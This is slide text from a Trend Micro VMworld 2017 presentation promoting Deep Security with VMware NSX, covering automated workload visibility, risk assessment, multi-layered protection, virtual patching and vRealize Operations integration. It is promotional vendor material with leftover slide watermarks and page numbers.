SAI3314BES Automated Security for the Real-time Enterprise with VMware NSX and Trend Micro Deep Security Chris Van Den Abbeele, Global Solution Architect, Trend Micro #VMworld #SAI3314BES
Automated Security for the Real-time Enterprise with VMware NSX and Trend Micro Deep Security Chris Van Den Abbeele, Global Solution Architect, Trend Micro VMworld 2017 Also meet us on Wednesday 11am Hall 8.0, Room 25 for [SAI3316BES] Skip the Security Slow Lane With VMware on AWS Content: Not for publication
Agenda Who is Trend Micro? Automated security: From bolted on to part of the fabric The Business Case for Automated Virtual Patching Integration with vrealize Operations 3
Trend Micro 28 years focused on security software Headquartered in Japan, Tokyo Exchange Nikkei Index (4704) Annual sales over $1B US Customers include 45 of top 50 global corporations 5500+ employees in over 50 countries 500k commercial customers & 155M endpoints protected Consumers r Small Business Enterprise Midsize Business 4
Integrated security: From bolted on to part of the fabric 5
What s the problem with bolted on security? With the introduction of workload virtualization, we made a quantum leap in Operations. The same is happening with network virtualization. But in many cases, Security, remained stuck in the Dark Ages. In many cases, Security is still something that is manually applied afterwards. In today s real-time enterprise, the Operations team has to do more with less, every day. They create more new workloads than ever before. Manually adding the security controls, takes a lot of time and it is often postponed (and/or finally... forgotten ) We need to shift left security and integrate it in the automation. 6
You can t protect what you don t see Visibility Context Risk assessment VMworld 2017 Content: Not for Protect Maintain publication 7
Visibility Many Security Dashboards only show workloads which had been brought under the control of the Security Solution (and have a security agent installed on them) Can you still see the trees in the forest? How can you detect Shadow IT? distribu or 8
Can you see VMs that were created by the Operations team in vcenter, VCD, vcloud air, AWS, Azure, Active Directory?...automatically, without running a scan and even if those are not yet protected? 9
Can you still see the trees in the forest? Can you organize your VMs in a structure that makes sense from a Security perspective? And which is not imposed by the underlying Operations? 10
Context Visibility Context Risk assessment VMworld 2017 Content: Not for Protect Maintain publication 11
Security is all about context Can you tell if you are looking at a Web server or a Database server? Is it Internet facing or in the Datacenter? Is it a server of workstation VM? Is it a server with Marketing flyers or is it a Finance system? Is it a Windows server, some Linux server, a Docker Host, a SAP system... 12
Context 13
Estimate the Risk Visibility Context Risk assessment VMworld 2017 Content: Not for Protect Maintain publication 14
Estimate the Risk Which OS (/version/patch level/..) is this? Which applications are running on this system? Which OS vulnerabilities exist on this system? Which Application vulnerabilities exist on this system? Can you automate a scan for vulnerabilities? How would you know which policies to apply? 15
Some High Risk Vulnerabilities 16
17 1
Automatically apply the right security controls Risk assessment Visibility Context Protect VMworld 2017 Content: Not for Maintain publication 18
Event-based tasks to profile new systems 19
20
The Same Exploits... now Protected by Deep Security 21
22
Rich API set Rich API set to integrate with virtually any orchestration and automation tools and/or scripting language VMworld 2017 PowerShell Content: Not for publication 23
Multi-Layered security for the Hybrid Cloud Intrusion Prevention Network Security Firewall Vulnerability Scanning Stop network attacks, shield vulnerable applications & servers VMworld 2017 Application Control System Security Integrity Monitoring Lock down systems & detect suspicious activity Log Inspection Anti- Malware Malware Prevention Behavioral Analysis & Machine Learning Stop malware & targeted attacks Sandbox Analysis Content: Not for publication 24
Full, multi-layered security 8 layers of security: - Anti-Malware - Web Reputation - Firewall - Intrusion Prevention - Integrity Monitoring - Log Inspection - Application Control - Protection for SAP systems (NW-VSI) 25
Make sure the systems remain protected Risk assessment Visibility Context Protect Maintain VMworld 2017 Content: Not for publication 26
Protect against drift Integrity Monitoring Monitor sensitive files and sensitive registry keys for changes Application Control: Freezes the server and blocks new executables and scripts from running 27
Protect against the latest vulnerabilities: Scheduled Vulnerability Scans 28
Securing business transformation Deep Security 29
The Business Case For Automated Virtual Patching 30
Typical patch cycle without virtual patching Monthly Security Patching Half-yearly Full Patching 12 x patching /year 31
High-impact zero days require immediate attention VMworld 2017 Are we vulnerable? (risk?) Who can provide a patch? When can we have the patch? When can we test it? Who can test it (team?) Where can we test it? (test environment) Content: Not for publication When can we have a maintenance window to Patch and Reboot our servers? 32
Typical patch cycle with virtual patching Automated Ongoing Security Patching Half-yearly Full Patching 2 x patching /year 33
Win-Win: increases security + reduces cost 34
5 days after ShellShock: 766 attacks blocked (Customer example) 766 attacks blocked by Deep Security Automated Virtual Patching on Sept 30th, at a customer managing 100+ instances If Emergency (physical) Patching takes 5 days... 35
Integration with vrealize Operations 36
Isolated worlds... User call - VM slow to respond or Administrator receives a security alert Virtual Infrastructure Administrator Log Ticket Log Ticket Security Administrator Admin logs in to vrealize Operations Admin logs in to Deep Security Manager Attempt to vmotion Reboot the VM Recycle the VM Change rules to block specific ports Quarantine and scan Close Ticket Close Ticket Root Cause Analysis Root Cause Analysis 37
Single pane of glass For Trend Micro events and VMware events 38
Correlate vrops Events with Security Events VMworld 2017 Content: Not for publication 39
Customer References 40
Deep Security on VMware NSX See Customer Success Stories - Join Experience - Emirates NBD - Integra Networks - Telecom Italia - University of Pittsburgh Please visit: TrendMicro.com/customers "Deep Security extends the benefits of NSX micro-segmentation with security policies and capabilities that automatically follow virtual machines no matter where they go." 41
Summary 42
Ongoing Automated Holistic Protection Visibility Connectors and Smart Folders across physical, virtual, cloud and containers allows for clear line of site from one console Context Rich data on workload, eventbased tasks to profile new systems Risk assessment Recommendation scan for high risk vulnerabilities APIs Protect Eight layers of security and threat protection capabilities Maintain Automated virtual patching, Application Control and integration with vrealize Operations 43
Summary Hopefully this presentation has provided a few insights and practical examples on how to bring your Hybrid Cloud Security into the 21 st century. By automating and integrating security in the operations stack, you can greatly improve your security posture and reduce operational costs Do the same setup and demo yourself in the VMworld Hands on Labs LAB HOL-1841 VMworld 2017 Content: Not for publication